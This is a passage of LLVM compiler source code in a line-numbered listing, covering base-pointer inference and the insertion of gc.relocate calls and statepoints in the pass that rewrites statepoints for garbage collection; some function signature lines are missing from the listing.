meetBDVStateImpl(RHS, LHS) && 753  "Math is wrong: meet does not commute!"); 754  return Result; 755 } 756  757 /// For a given value or instruction, figure out what base ptr its derived from. 758 /// For gc objects, this is simply itself. On success, returns a value which is 759 /// the base pointer. (This is reliable and can be used for relocation.) On 760 /// failure, returns nullptr. 762  Value *Def = findBaseOrBDV(I, Cache); 763  764  if (isKnownBaseResult(Def)) 765  return Def; 766  767  // Here's the rough algorithm: 768  // - For every SSA value, construct a mapping to either an actual base 769  // pointer or a PHI which obscures the base pointer. 770  // - Construct a mapping from PHI to unknown TOP state. Use an 771  // optimistic algorithm to propagate base pointer information. Lattice 772  // looks like: 773  // UNKNOWN 774  // b1 b2 b3 b4 775  // CONFLICT 776  // When algorithm terminates, all PHIs will either have a single concrete 777  // base or be in a conflict state. 778  // - For every conflict, insert a dummy PHI node without arguments. Add 779  // these to the base[Instruction] = BasePtr mapping. For every 780  // non-conflict, add the actual base. 781  // - For every conflict, add arguments for the base[a] of each input 782  // arguments. 783  // 784  // Note: A simpler form of this would be to add the conflict form of all 785  // PHIs without running the optimistic algorithm. This would be 786  // analogous to pessimistic data flow and would likely lead to an 787  // overall worse solution. 788  789 #ifndef NDEBUG 790  auto isExpectedBDVType = [](Value *BDV) { 791  return isa<PHINode>(BDV) || isa<SelectInst>(BDV) || 792  isa<ExtractElementInst>(BDV) || isa<InsertElementInst>(BDV) || 793  isa<ShuffleVectorInst>(BDV); 794  }; 795 #endif 796  797  // Once populated, will contain a mapping from each potentially non-base BDV 798  // to a lattice value (described above) which corresponds to that BDV. 799  // We use the order of insertion (DFS over the def/use graph) to provide a 800  // stable deterministic ordering for visiting DenseMaps (which are unordered) 801  // below. This is important for deterministic compilation. 803  804  // Recursively fill in all base defining values reachable from the initial 805  // one for which we don't already know a definite base value for 806  /* scope */ { 807  SmallVector<Value*, 16> Worklist; 808  Worklist.push_back(Def); 809  States.insert({Def, BDVState()}); 810  while (!Worklist.empty()) { 811  Value *Current = Worklist.pop_back_val(); 812  assert(!isKnownBaseResult(Current) && "why did it get added?"); 813  814  auto visitIncomingValue = [&](Value *InVal) { 815  Value *Base = findBaseOrBDV(InVal, Cache); 816  if (isKnownBaseResult(Base)) 817  // Known bases won't need new instructions introduced and can be 818  // ignored safely 819  return; 820  assert(isExpectedBDVType(Base) && "the only non-base values " 821  "we see should be base defining values"); 822  if (States.insert(std::make_pair(Base, BDVState())).second) 823  Worklist.push_back(Base); 824  }; 825  if (PHINode *PN = dyn_cast<PHINode>(Current)) { 826  for (Value *InVal : PN->incoming_values()) 827  visitIncomingValue(InVal); 828  } else if (SelectInst *SI = dyn_cast<SelectInst>(Current)) { 829  visitIncomingValue(SI->getTrueValue()); 830  visitIncomingValue(SI->getFalseValue()); 831  } else if (auto *EE = dyn_cast<ExtractElementInst>(Current)) { 832  visitIncomingValue(EE->getVectorOperand()); 833  } else if (auto *IE = dyn_cast<InsertElementInst>(Current)) { 834  visitIncomingValue(IE->getOperand(0)); // vector operand 835  visitIncomingValue(IE->getOperand(1)); // scalar operand 836  } else if (auto *SV = dyn_cast<ShuffleVectorInst>(Current)) { 837  visitIncomingValue(SV->getOperand(0)); 838  visitIncomingValue(SV->getOperand(1)); 839  } 840  else { 841  llvm_unreachable("Unimplemented instruction case"); 842  } 843  } 844  } 845  846 #ifndef NDEBUG 847  LLVM_DEBUG(dbgs() << "States after initialization:\n"); 848  for (auto Pair : States) { 849  LLVM_DEBUG(dbgs() << " " << Pair.second << " for " << *Pair.first << "\n"); 850  } 851 #endif 852  853  // Return a phi state for a base defining value. We'll generate a new 854  // base state for known bases and expect to find a cached state otherwise. 855  auto getStateForBDV = [&](Value *baseValue) { 856  if (isKnownBaseResult(baseValue)) 857  return BDVState(baseValue); 858  auto I = States.find(baseValue); 859  assert(I != States.end() && "lookup failed!"); 860  return I->second; 861  }; 862  863  bool Progress = true; 864  while (Progress) { 865 #ifndef NDEBUG 866  const size_t OldSize = States.size(); 867 #endif 868  Progress = false; 869  // We're only changing values in this loop, thus safe to keep iterators. 870  // Since this is computing a fixed point, the order of visit does not 871  // effect the result. TODO: We could use a worklist here and make this run 872  // much faster. 873  for (auto Pair : States) { 874  Value *BDV = Pair.first; 875  assert(!isKnownBaseResult(BDV) && "why did it get added?"); 876  877  // Given an input value for the current instruction, return a BDVState 878  // instance which represents the BDV of that value. 879  auto getStateForInput = [&](Value *V) mutable { 880  Value *BDV = findBaseOrBDV(V, Cache); 881  return getStateForBDV(BDV); 882  }; 883  884  BDVState NewState; 885  if (SelectInst *SI = dyn_cast<SelectInst>(BDV)) { 886  NewState = meetBDVState(NewState, getStateForInput(SI->getTrueValue())); 887  NewState = 888  meetBDVState(NewState, getStateForInput(SI->getFalseValue())); 889  } else if (PHINode *PN = dyn_cast<PHINode>(BDV)) { 890  for (Value *Val : PN->incoming_values()) 891  NewState = meetBDVState(NewState, getStateForInput(Val)); 892  } else if (auto *EE = dyn_cast<ExtractElementInst>(BDV)) { 893  // The 'meet' for an extractelement is slightly trivial, but it's still 894  // useful in that it drives us to conflict if our input is. 895  NewState = 896  meetBDVState(NewState, getStateForInput(EE->getVectorOperand())); 897  } else if (auto *IE = dyn_cast<InsertElementInst>(BDV)){ 898  // Given there's a inherent type mismatch between the operands, will 899  // *always* produce Conflict. 900  NewState = meetBDVState(NewState, getStateForInput(IE->getOperand(0))); 901  NewState = meetBDVState(NewState, getStateForInput(IE->getOperand(1))); 902  } else { 903  // The only instance this does not return a Conflict is when both the 904  // vector operands are the same vector. 905  auto *SV = cast<ShuffleVectorInst>(BDV); 906  NewState = meetBDVState(NewState, getStateForInput(SV->getOperand(0))); 907  NewState = meetBDVState(NewState, getStateForInput(SV->getOperand(1))); 908  } 909  910  BDVState OldState = States[BDV]; 911  if (OldState != NewState) { 912  Progress = true; 913  States[BDV] = NewState; 914  } 915  } 916  917  assert(OldSize == States.size() && 918  "fixed point shouldn't be adding any new nodes to state"); 919  } 920  921 #ifndef NDEBUG 922  LLVM_DEBUG(dbgs() << "States after meet iteration:\n"); 923  for (auto Pair : States) { 924  LLVM_DEBUG(dbgs() << " " << Pair.second << " for " << *Pair.first << "\n"); 925  } 926 #endif 927  928  // Insert Phis for all conflicts 929  // TODO: adjust naming patterns to avoid this order of iteration dependency 930  for (auto Pair : States) { 931  Instruction *I = cast<Instruction>(Pair.first); 932  BDVState State = Pair.second; 933  assert(!isKnownBaseResult(I) && "why did it get added?"); 934  assert(!State.isUnknown() && "Optimistic algorithm didn't complete!"); 935  936  // extractelement instructions are a bit special in that we may need to 937  // insert an extract even when we know an exact base for the instruction. 938  // The problem is that we need to convert from a vector base to a scalar 939  // base for the particular indice we're interested in. 940  if (State.isBase() && isa<ExtractElementInst>(I) && 941  isa<VectorType>(State.getBaseValue()->getType())) { 942  auto *EE = cast<ExtractElementInst>(I); 943  // TODO: In many cases, the new instruction is just EE itself. We should 944  // exploit this, but can't do it here since it would break the invariant 945  // about the BDV not being known to be a base. 946  auto *BaseInst = ExtractElementInst::Create( 947  State.getBaseValue(), EE->getIndexOperand(), "base_ee", EE); 948  BaseInst->setMetadata("is_base_value", MDNode::get(I->getContext(), {})); 949  States[I] = BDVState(BDVState::Base, BaseInst); 950  } 951  952  // Since we're joining a vector and scalar base, they can never be the 953  // same. As a result, we should always see insert element having reached 954  // the conflict state. 955  assert(!isa<InsertElementInst>(I) || State.isConflict()); 956  957  if (!State.isConflict()) 958  continue; 959  960  /// Create and insert a new instruction which will represent the base of 961  /// the given instruction 'I'. 962  auto MakeBaseInstPlaceholder = [](Instruction *I) -> Instruction* { 963  if (isa<PHINode>(I)) { 964  BasicBlock *BB = I->getParent(); 965  int NumPreds = pred_size(BB); 966  assert(NumPreds > 0 && "how did we reach here"); 967  std::string Name = suffixed_name_or(I, ".base", "base_phi"); 968  return PHINode::Create(I->getType(), NumPreds, Name, I); 969  } else if (SelectInst *SI = dyn_cast<SelectInst>(I)) { 970  // The undef will be replaced later 971  UndefValue *Undef = UndefValue::get(SI->getType()); 972  std::string Name = suffixed_name_or(I, ".base", "base_select"); 973  return SelectInst::Create(SI->getCondition(), Undef, Undef, Name, SI); 974  } else if (auto *EE = dyn_cast<ExtractElementInst>(I)) { 975  UndefValue *Undef = UndefValue::get(EE->getVectorOperand()->getType()); 976  std::string Name = suffixed_name_or(I, ".base", "base_ee"); 977  return ExtractElementInst::Create(Undef, EE->getIndexOperand(), Name, 978  EE); 979  } else if (auto *IE = dyn_cast<InsertElementInst>(I)) { 980  UndefValue *VecUndef = UndefValue::get(IE->getOperand(0)->getType()); 981  UndefValue *ScalarUndef = UndefValue::get(IE->getOperand(1)->getType()); 982  std::string Name = suffixed_name_or(I, ".base", "base_ie"); 983  return InsertElementInst::Create(VecUndef, ScalarUndef, 984  IE->getOperand(2), Name, IE); 985  } else { 986  auto *SV = cast<ShuffleVectorInst>(I); 987  UndefValue *VecUndef = UndefValue::get(SV->getOperand(0)->getType()); 988  std::string Name = suffixed_name_or(I, ".base", "base_sv"); 989  return new ShuffleVectorInst(VecUndef, VecUndef, SV->getOperand(2), 990  Name, SV); 991  } 992  }; 993  Instruction *BaseInst = MakeBaseInstPlaceholder(I); 994  // Add metadata marking this as a base value 995  BaseInst->setMetadata("is_base_value", MDNode::get(I->getContext(), {})); 996  States[I] = BDVState(BDVState::Conflict, BaseInst); 997  } 998  999  // Returns a instruction which produces the base pointer for a given 1000  // instruction. The instruction is assumed to be an input to one of the BDVs 1001  // seen in the inference algorithm above. As such, we must either already 1002  // know it's base defining value is a base, or have inserted a new 1003  // instruction to propagate the base of it's BDV and have entered that newly 1004  // introduced instruction into the state table. In either case, we are 1005  // assured to be able to determine an instruction which produces it's base 1006  // pointer. 1007  auto getBaseForInput = [&](Value *Input, Instruction *InsertPt) { 1008  Value *BDV = findBaseOrBDV(Input, Cache); 1009  Value *Base = nullptr; 1010  if (isKnownBaseResult(BDV)) { 1011  Base = BDV; 1012  } else { 1013  // Either conflict or base. 1014  assert(States.count(BDV)); 1015  Base = States[BDV].getBaseValue(); 1016  } 1017  assert(Base && "Can't be null"); 1018  // The cast is needed since base traversal may strip away bitcasts 1019  if (Base->getType() != Input->getType() && InsertPt) 1020  Base = new BitCastInst(Base, Input->getType(), "cast", InsertPt); 1021  return Base; 1022  }; 1023  1024  // Fixup all the inputs of the new PHIs. Visit order needs to be 1025  // deterministic and predictable because we're naming newly created 1026  // instructions. 1027  for (auto Pair : States) { 1028  Instruction *BDV = cast<Instruction>(Pair.first); 1029  BDVState State = Pair.second; 1030  1031  assert(!isKnownBaseResult(BDV) && "why did it get added?"); 1032  assert(!State.isUnknown() && "Optimistic algorithm didn't complete!"); 1033  if (!State.isConflict()) 1034  continue; 1035  1036  if (PHINode *BasePHI = dyn_cast<PHINode>(State.getBaseValue())) { 1037  PHINode *PN = cast<PHINode>(BDV); 1038  unsigned NumPHIValues = PN->getNumIncomingValues(); 1039  for (unsigned i = 0; i < NumPHIValues; i++) { 1040  Value *InVal = PN->getIncomingValue(i); 1041  BasicBlock *InBB = PN->getIncomingBlock(i); 1042  1043  // If we've already seen InBB, add the same incoming value 1044  // we added for it earlier. The IR verifier requires phi 1045  // nodes with multiple entries from the same basic block 1046  // to have the same incoming value for each of those 1047  // entries. If we don't do this check here and basephi 1048  // has a different type than base, we'll end up adding two 1049  // bitcasts (and hence two distinct values) as incoming 1050  // values for the same basic block. 1051  1052  int BlockIndex = BasePHI->getBasicBlockIndex(InBB); 1053  if (BlockIndex != -1) { 1054  Value *OldBase = BasePHI->getIncomingValue(BlockIndex); 1055  BasePHI->addIncoming(OldBase, InBB); 1056  1057 #ifndef NDEBUG 1058  Value *Base = getBaseForInput(InVal, nullptr); 1059  // In essence this assert states: the only way two values 1060  // incoming from the same basic block may be different is by 1061  // being different bitcasts of the same value. A cleanup 1062  // that remains TODO is changing findBaseOrBDV to return an 1063  // llvm::Value of the correct type (and still remain pure). 1064  // This will remove the need to add bitcasts. 1065  assert(Base->stripPointerCasts() == OldBase->stripPointerCasts() && 1066  "Sanity -- findBaseOrBDV should be pure!"); 1067 #endif 1068  continue; 1069  } 1070  1071  // Find the instruction which produces the base for each input. We may 1072  // need to insert a bitcast in the incoming block. 1073  // TODO: Need to split critical edges if insertion is needed 1074  Value *Base = getBaseForInput(InVal, InBB->getTerminator()); 1075  BasePHI->addIncoming(Base, InBB); 1076  } 1077  assert(BasePHI->getNumIncomingValues() == NumPHIValues); 1078  } else if (SelectInst *BaseSI = 1079  dyn_cast<SelectInst>(State.getBaseValue())) { 1080  SelectInst *SI = cast<SelectInst>(BDV); 1081  1082  // Find the instruction which produces the base for each input. 1083  // We may need to insert a bitcast. 1084  BaseSI->setTrueValue(getBaseForInput(SI->getTrueValue(), BaseSI)); 1085  BaseSI->setFalseValue(getBaseForInput(SI->getFalseValue(), BaseSI)); 1086  } else if (auto *BaseEE = 1087  dyn_cast<ExtractElementInst>(State.getBaseValue())) { 1088  Value *InVal = cast<ExtractElementInst>(BDV)->getVectorOperand(); 1089  // Find the instruction which produces the base for each input. We may 1090  // need to insert a bitcast. 1091  BaseEE->setOperand(0, getBaseForInput(InVal, BaseEE)); 1092  } else if (auto *BaseIE = dyn_cast<InsertElementInst>(State.getBaseValue())){ 1093  auto *BdvIE = cast<InsertElementInst>(BDV); 1094  auto UpdateOperand = [&](int OperandIdx) { 1095  Value *InVal = BdvIE->getOperand(OperandIdx); 1096  Value *Base = getBaseForInput(InVal, BaseIE); 1097  BaseIE->setOperand(OperandIdx, Base); 1098  }; 1099  UpdateOperand(0); // vector operand 1100  UpdateOperand(1); // scalar operand 1101  } else { 1102  auto *BaseSV = cast<ShuffleVectorInst>(State.getBaseValue()); 1103  auto *BdvSV = cast<ShuffleVectorInst>(BDV); 1104  auto UpdateOperand = [&](int OperandIdx) { 1105  Value *InVal = BdvSV->getOperand(OperandIdx); 1106  Value *Base = getBaseForInput(InVal, BaseSV); 1107  BaseSV->setOperand(OperandIdx, Base); 1108  }; 1109  UpdateOperand(0); // vector operand 1110  UpdateOperand(1); // vector operand 1111  } 1112  } 1113  1114  // Cache all of our results so we can cheaply reuse them 1115  // NOTE: This is actually two caches: one of the base defining value 1116  // relation and one of the base pointer relation! FIXME 1117  for (auto Pair : States) { 1118  auto *BDV = Pair.first; 1119  Value *Base = Pair.second.getBaseValue(); 1120  assert(BDV && Base); 1121  assert(!isKnownBaseResult(BDV) && "why did it get added?"); 1122  1123  LLVM_DEBUG( 1124  dbgs() << "Updating base value cache" 1125  << " for: " << BDV->getName() << " from: " 1126  << (Cache.count(BDV) ? Cache[BDV]->getName().str() : "none") 1127  << " to: " << Base->getName() << "\n"); 1128  1129  if (Cache.count(BDV)) { 1130  assert(isKnownBaseResult(Base) && 1131  "must be something we 'know' is a base pointer"); 1132  // Once we transition from the BDV relation being store in the Cache to 1133  // the base relation being stored, it must be stable 1134  assert((!isKnownBaseResult(Cache[BDV]) || Cache[BDV] == Base) && 1135  "base relation should be stable"); 1136  } 1137  Cache[BDV] = Base; 1138  } 1139  assert(Cache.count(Def)); 1140  return Cache[Def]; 1141 } 1142  1143 // For a set of live pointers (base and/or derived), identify the base 1144 // pointer of the object which they are derived from. This routine will 1145 // mutate the IR graph as needed to make the 'base' pointer live at the 1146 // definition site of 'derived'. This ensures that any use of 'derived' can 1147 // also use 'base'. This may involve the insertion of a number of 1148 // additional PHI nodes. 1149 // 1150 // preconditions: live is a set of pointer type Values 1151 // 1152 // side effects: may insert PHI nodes into the existing CFG, will preserve 1153 // CFG, will not remove or mutate any existing nodes 1154 // 1155 // post condition: PointerToBase contains one (derived, base) pair for every 1156 // pointer in live. Note that derived can be equal to base if the original 1157 // pointer was a base pointer. 1158 static void 1160  MapVector<Value *, Value *> &PointerToBase, 1161  DominatorTree *DT, DefiningValueMapTy &DVCache) { 1162  for (Value *ptr : live) { 1163  Value *base = findBasePointer(ptr, DVCache); 1164  assert(base && "failed to find base pointer"); 1165  PointerToBase[ptr] = base; 1166  assert((!isa<Instruction>(base) || !isa<Instruction>(ptr) || 1167  DT->dominates(cast<Instruction>(base)->getParent(), 1168  cast<Instruction>(ptr)->getParent())) && 1169  "The base we found better dominate the derived pointer"); 1170  } 1171 } 1172  1173 /// Find the required based pointers (and adjust the live set) for the given 1174 /// parse point. 1176  CallBase *Call, 1177  PartiallyConstructedSafepointRecord &result) { 1178  MapVector<Value *, Value *> PointerToBase; 1179  findBasePointers(result.LiveSet, PointerToBase, &DT, DVCache); 1180  1181  if (PrintBasePointers) { 1182  errs() << "Base Pairs (w/o Relocation):\n"; 1183  for (auto &Pair : PointerToBase) { 1184  errs() << " derived "; 1185  Pair.first->printAsOperand(errs(), false); 1186  errs() << " base "; 1187  Pair.second->printAsOperand(errs(), false); 1188  errs() << "\n";; 1189  } 1190  } 1191  1192  result.PointerToBase = PointerToBase; 1193 } 1194  1195 /// Given an updated version of the dataflow liveness results, update the 1196 /// liveset and base pointer maps for the call site CS. 1197 static void recomputeLiveInValues(GCPtrLivenessData &RevisedLivenessData, 1198  CallBase *Call, 1199  PartiallyConstructedSafepointRecord &result); 1200  1202  Function &F, DominatorTree &DT, ArrayRef<CallBase *> toUpdate, 1204  // TODO-PERF: reuse the original liveness, then simply run the dataflow 1205  // again. The old values are still live and will help it stabilize quickly. 1206  GCPtrLivenessData RevisedLivenessData; 1207  computeLiveInValues(DT, F, RevisedLivenessData); 1208  for (size_t i = 0; i < records.size(); i++) { 1209  struct PartiallyConstructedSafepointRecord &info = records[i]; 1210  recomputeLiveInValues(RevisedLivenessData, toUpdate[i], info); 1211  } 1212 } 1213  1214 // When inserting gc.relocate and gc.result calls, we need to ensure there are 1215 // no uses of the original value / return value between the gc.statepoint and 1216 // the gc.relocate / gc.result call. One case which can arise is a phi node 1217 // starting one of the successor blocks. We also need to be able to insert the 1218 // gc.relocates only on the path which goes through the statepoint. We might 1219 // need to split an edge to make this possible. 1220 static BasicBlock * 1222  DominatorTree &DT) { 1223  BasicBlock *Ret = BB; 1224  if (!BB->getUniquePredecessor()) 1225  Ret = SplitBlockPredecessors(BB, InvokeParent, "", &DT); 1226  1227  // Now that 'Ret' has unique predecessor we can safely remove all phi nodes 1228  // from it 1230  assert(!isa<PHINode>(Ret->begin()) && 1231  "All PHI nodes should have been removed!"); 1232  1233  // At this point, we can safely insert a gc.relocate or gc.result as the first 1234  // instruction in Ret if needed. 1235  return Ret; 1236 } 1237  1238 // Create new attribute set containing only attributes which can be transferred 1239 // from original call to the safepoint. 1241  if (AL.isEmpty()) 1242  return AL; 1243  1244  // Remove the readonly, readnone, and statepoint function attributes. 1245  AttrBuilder FnAttrs = AL.getFnAttributes(); 1246  FnAttrs.removeAttribute(Attribute::ReadNone); 1247  FnAttrs.removeAttribute(Attribute::ReadOnly); 1248  for (Attribute A : AL.getFnAttributes()) { 1250  FnAttrs.remove(A); 1251  } 1252  1253  // Just skip parameter and return attributes for now 1254  LLVMContext &Ctx = AL.getContext(); 1256  AttributeSet::get(Ctx, FnAttrs)); 1257 } 1258  1259 /// Helper function to place all gc relocates necessary for the given 1260 /// statepoint. 1261 /// Inputs: 1262 /// liveVariables - list of variables to be relocated. 1263 /// liveStart - index of the first live variable. 1264 /// basePtrs - base pointers. 1265 /// statepointToken - statepoint instruction to which relocates should be 1266 /// bound. 1267 /// Builder - Llvm IR builder to be used to construct new calls. 1269  const int LiveStart, 1270  ArrayRef<Value *> BasePtrs, 1271  Instruction *StatepointToken, 1272  IRBuilder<> Builder) { 1273  if (LiveVariables.empty()) 1274  return; 1275  1276  auto FindIndex = [](ArrayRef<Value *> LiveVec, Value *Val) { 1277  auto ValIt = llvm::find(LiveVec, Val); 1278  assert(ValIt != LiveVec.end() && "Val not found in LiveVec!"); 1279  size_t Index = std::distance(LiveVec.begin(), ValIt); 1280  assert(Index < LiveVec.size() && "Bug in std::find?"); 1281  return Index; 1282  }; 1283  Module *M = StatepointToken->getModule(); 1284  1285  // All gc_relocate are generated as i8 addrspace(1)* (or a vector type whose 1286  // element type is i8 addrspace(1)*). We originally generated unique 1287  // declarations for each pointer type, but this proved problematic because 1288  // the intrinsic mangling code is incomplete and fragile. Since we're moving 1289  // towards a single unified pointer type anyways, we can just cast everything 1290  // to an i8* of the right address space. A bitcast is added later to convert 1291  // gc_relocate to the actual value's type. 1292  auto getGCRelocateDecl = [&] (Type *Ty) { 1294  auto AS = Ty->getScalarType()->getPointerAddressSpace(); 1295  Type *NewTy = Type::getInt8PtrTy(M->getContext(), AS); 1296  if (auto *VT = dyn_cast<VectorType>(Ty)) 1297  NewTy = VectorType::get(NewTy, VT->getNumElements()); 1298  return Intrinsic::getDeclaration(M, Intrinsic::experimental_gc_relocate, 1299  {NewTy}); 1300  }; 1301  1302  // Lazily populated map from input types to the canonicalized form mentioned 1303  // in the comment above. This should probably be cached somewhere more 1304  // broadly. 1305  DenseMap<Type *, Function *> TypeToDeclMap; 1306  1307  for (unsigned i = 0; i < LiveVariables.size(); i++) { 1308  // Generate the gc.relocate call and save the result 1309  Value *BaseIdx = 1310  Builder.getInt32(LiveStart + FindIndex(LiveVariables, BasePtrs[i])); 1311  Value *LiveIdx = Builder.getInt32(LiveStart + i); 1312  1313  Type *Ty = LiveVariables[i]->getType(); 1314  if (!TypeToDeclMap.count(Ty)) 1315  TypeToDeclMap[Ty] = getGCRelocateDecl(Ty); 1316  Function *GCRelocateDecl = TypeToDeclMap[Ty]; 1317  1318  // only specify a debug name if we can give a useful one 1319  CallInst *Reloc = Builder.CreateCall( 1320  GCRelocateDecl, {StatepointToken, BaseIdx, LiveIdx}, 1321  suffixed_name_or(LiveVariables[i], ".relocated", "")); 1322  // Trick CodeGen into thinking there are lots of free registers at this 1323  // fake call. 1325  } 1326 } 1327  1328 namespace { 1329  1330 /// This struct is used to defer RAUWs and `eraseFromParent` s. Using this 1331 /// avoids having to worry about keeping around dangling pointers to Values. 1332 class DeferredReplacement { 1335  bool IsDeoptimize = false; 1336  1337  DeferredReplacement() = default; 1338  1339 public: 1340  static DeferredReplacement createRAUW(Instruction *Old, Instruction *New) { 1341  assert(Old != New && Old && New && 1342  "Cannot RAUW equal values or to / from null!"); 1343  1344  DeferredReplacement D; 1345  D.Old = Old; 1346  D.New = New; 1347  return D; 1348  } 1349  1350  static DeferredReplacement createDelete(Instruction *ToErase) { 1351  DeferredReplacement D; 1352  D.Old = ToErase; 1353  return D; 1354  } 1355  1356  static DeferredReplacement createDeoptimizeReplacement(Instruction *Old) { 1357 #ifndef NDEBUG 1358  auto *F = cast<CallInst>(Old)->getCalledFunction(); 1359  assert(F && F->getIntrinsicID() == Intrinsic::experimental_deoptimize && 1360  "Only way to construct a deoptimize deferred replacement"); 1361 #endif 1362  DeferredReplacement D; 1363  D.Old = Old; 1364  D.IsDeoptimize = true; 1365  return D; 1366  } 1367  1368  /// Does the task represented by this instance. 1369  void doReplacement() { 1370  Instruction *OldI = Old; 1371  Instruction *NewI = New; 1372  1373  assert(OldI != NewI && "Disallowed at construction?!"); 1374  assert((!IsDeoptimize || !New) && 1375  "Deoptimize intrinsics are not replaced!"); 1376  1377  Old = nullptr; 1378  New = nullptr; 1379  1380  if (NewI) 1381  OldI->replaceAllUsesWith(NewI); 1382  1383  if (IsDeoptimize) { 1384  // Note: we've inserted instructions, so the call to llvm.deoptimize may 1385  // not necessarily be followed by the matching return. 1386  auto *RI = cast<ReturnInst>(OldI->getParent()->getTerminator()); 1387  new UnreachableInst(RI->getContext(), RI); 1388  RI->eraseFromParent(); 1389  } 1390  1391  OldI->eraseFromParent(); 1392  } 1393 }; 1394  1395 } // end anonymous namespace 1396  1398  const char *DeoptLowering = "deopt-lowering"; 1399  if (Call->hasFnAttr(DeoptLowering)) { 1400  // FIXME: Calls have a *really* confusing interface around attributes 1401  // with values. 1402  const AttributeList &CSAS = Call->getAttributes(); 1403  if (CSAS.hasAttribute(AttributeList::FunctionIndex, DeoptLowering)) 1404  return CSAS.getAttribute(AttributeList::FunctionIndex, DeoptLowering) 1405  .getValueAsString(); 1406  Function *F = Call->getCalledFunction(); 1407  assert(F && F->hasFnAttribute(DeoptLowering)); 1408  return F->getFnAttribute(DeoptLowering).getValueAsString(); 1409  } 1410  return "live-through"; 1411 } 1412  1413 static void 1414 makeStatepointExplicitImpl(CallBase *Call, /* to replace */ 1415  const SmallVectorImpl<Value *> &BasePtrs, 1417  PartiallyConstructedSafepointRecord &Result, 1418  std::vector<DeferredReplacement> &Replacements) { 1419  assert(BasePtrs.size() == LiveVariables.size()); 1420  1421  // Then go ahead and use the builder do actually do the inserts. We insert 1422  // immediately before the previous instruction under the assumption that all 1423  // arguments will be available here. We can't insert afterwards since we may 1424  // be replacing a terminator. 1425  IRBuilder<> Builder(Call); 1426  1427  ArrayRef<Value *> GCArgs(LiveVariables); 1428  uint64_t StatepointID = StatepointDirectives::DefaultStatepointID; 1429  uint32_t NumPatchBytes = 0; 1431  1432  ArrayRef<Use> CallArgs(Call->arg_begin(), Call->arg_end()); 1433  ArrayRef<Use> DeoptArgs = GetDeoptBundleOperands(Call); 1434  ArrayRef<Use> TransitionArgs; 1435  if (auto TransitionBundle = 1438  TransitionArgs = TransitionBundle->Inputs; 1439  } 1440  1441  // Instead of lowering calls to @llvm.experimental.deoptimize as normal calls 1442  // with a return value, we lower then as never returning calls to 1443  // __llvm_deoptimize that are followed by unreachable to get better codegen. 1444  bool IsDeoptimize = false; 1445  1448  if (SD.NumPatchBytes) 1449  NumPatchBytes = *SD.NumPatchBytes; 1450  if (SD.StatepointID) 1451  StatepointID = *SD.StatepointID; 1452  1453  // Pass through the requested lowering if any. The default is live-through. 1454  StringRef DeoptLowering = getDeoptLowering(Call); 1455  if (DeoptLowering.equals("live-in")) 1457  else { 1458  assert(DeoptLowering.equals("live-through") && "Unsupported value!"); 1459  } 1460  1461  Value *CallTarget = Call->getCalledValue(); 1462  if (Function *F = dyn_cast<Function>(CallTarget)) { 1463  if (F->getIntrinsicID() == Intrinsic::experimental_deoptimize) { 1464  // Calls to llvm.experimental.deoptimize are lowered to calls to the 1465  // __llvm_deoptimize symbol. We want to resolve this now, since the 1466  // verifier does not allow taking the address of an intrinsic function. 1467  1468  SmallVector<Type *, 8> DomainTy; 1469  for (Value *Arg : CallArgs) 1470  DomainTy.push_back(Arg->getType()); 1471  auto *FTy = FunctionType::get(Type::getVoidTy(F->getContext()), DomainTy, 1472  /* isVarArg = */ false); 1473  1474  // Note: CallTarget can be a bitcast instruction of a symbol if there are 1475  // calls to @llvm.experimental.deoptimize with different argument types in 1476  // the same module. This is fine -- we assume the frontend knew what it 1477  // was doing when generating this kind of IR. 1478  CallTarget = F->getParent() 1479  ->getOrInsertFunction("__llvm_deoptimize", FTy) 1480  .getCallee(); 1481  1482  IsDeoptimize = true; 1483  } 1484  } 1485  1486  // Create the statepoint given all the arguments 1487  Instruction *Token = nullptr; 1488  if (auto *CI = dyn_cast<CallInst>(Call)) { 1489  CallInst *SPCall = Builder.CreateGCStatepointCall( 1490  StatepointID, NumPatchBytes, CallTarget, Flags, CallArgs, 1491  TransitionArgs, DeoptArgs, GCArgs, "safepoint_token"); 1492  1493  SPCall->setTailCallKind(CI->getTailCallKind()); 1494  SPCall->setCallingConv(CI->getCallingConv()); 1495  1496  // Currently we will fail on parameter attributes and on certain 1497  // function attributes. In case if we can handle this set of attributes - 1498  // set up function attrs directly on statepoint and return attrs later for 1499  // gc_result intrinsic. 1500  SPCall->setAttributes(legalizeCallAttributes(CI->getAttributes())); 1501  1502  Token = SPCall; 1503  1504  // Put the following gc_result and gc_relocate calls immediately after the 1505  // the old call (which we're about to delete) 1506  assert(CI->getNextNode() && "Not a terminator, must have next!"); 1507  Builder.SetInsertPoint(CI->getNextNode()); 1508  Builder.SetCurrentDebugLocation(CI->getNextNode()->getDebugLoc()); 1509  } else { 1510  auto *II = cast<InvokeInst>(Call); 1511  1512  // Insert the new invoke into the old block. We'll remove the old one in a 1513  // moment at which point this will become the new terminator for the 1514  // original block. 1515  InvokeInst *SPInvoke = Builder.CreateGCStatepointInvoke( 1516  StatepointID, NumPatchBytes, CallTarget, II->getNormalDest(), 1517  II->getUnwindDest(), Flags, CallArgs, TransitionArgs, DeoptArgs, GCArgs, 1518  "statepoint_token"); 1519  1520  SPInvoke->setCallingConv(II->getCallingConv()); 1521  1522  // Currently we will fail on parameter attributes and on certain 1523  // function attributes. In case if we can handle this set of attributes - 1524  // set up function attrs directly on statepoint and return attrs later for 1525  // gc_result intrinsic. 1526  SPInvoke->setAttributes(legalizeCallAttributes(II->getAttributes())); 1527  1528  Token = SPInvoke; 1529  1530  // Generate gc relocates in exceptional path 1531  BasicBlock *UnwindBlock = II->getUnwindDest(); 1532  assert(!isa<PHINode>(UnwindBlock->begin()) && 1533  UnwindBlock->getUniquePredecessor() && 1534  "can't safely insert in this block!"); 1535  1536  Builder.SetInsertPoint(&*UnwindBlock->getFirstInsertionPt()); 1537  Builder.SetCurrentDebugLocation(II->getDebugLoc()); 1538  1539  // Attach exceptional gc relocates to the landingpad. 1540  Instruction *ExceptionalToken = UnwindBlock->getLandingPadInst(); 1541  Result.UnwindToken = ExceptionalToken; 1542  1543  const unsigned LiveStartIdx = Statepoint(Token).gcArgsStartIdx(); 1544  CreateGCRelocates(LiveVariables, LiveStartIdx, BasePtrs, ExceptionalToken, 1545  Builder); 1546  1547  // Generate gc relocates and returns for normal block 1548  BasicBlock *NormalDest = II->getNormalDest(); 1549  assert(!isa<PHINode>(NormalDest->begin()) && 1550  NormalDest->getUniquePredecessor() && 1551  "can't safely insert in this block!"); 1552  1553  Builder.SetInsertPoint(&*NormalDest->getFirstInsertionPt()); 1554  1555  // gc relocates will be generated later as if it were regular call 1556  // statepoint 1557  } 